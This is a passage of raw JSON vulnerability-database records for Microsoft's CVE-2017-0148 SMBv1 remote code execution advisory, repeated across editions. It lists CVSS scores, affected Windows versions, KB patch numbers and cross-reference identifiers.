"NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-09T05:02:02", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012213", "KB3177186", "KB3205409", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB3212646", "KB4012214", "KB4012606", "KB3210720", "KB4012216", "KB4012217", "KB4012215", "KB4012598", "KB3205401", "KB4012212", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T05:02:02", "differentElements": ["msAffectedSoftware"], "edition": 23}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-09T06:50:25", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012214", "KB4012217", "KB4012216", "KB4013198", "KB3212646", "KBMS16-110, 3187754", "KB4012215", "KB3210721", "KB3177186", "KB4012598", "KB3205401", "KB4013429", "KB4012213", "KB4012606", "KB3213986", "KB3210720", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T06:50:25", "differentElements": ["msAffectedSoftware"], "edition": 24}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-10T08:45:32", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB3177186", "KB3205409", "KB4012598", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB4013198", "KB4013429", "KB3210720", "KB4012606", "KB4012213", "KB3210721", "KB4012216", "KB4012214", "KB4012212", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 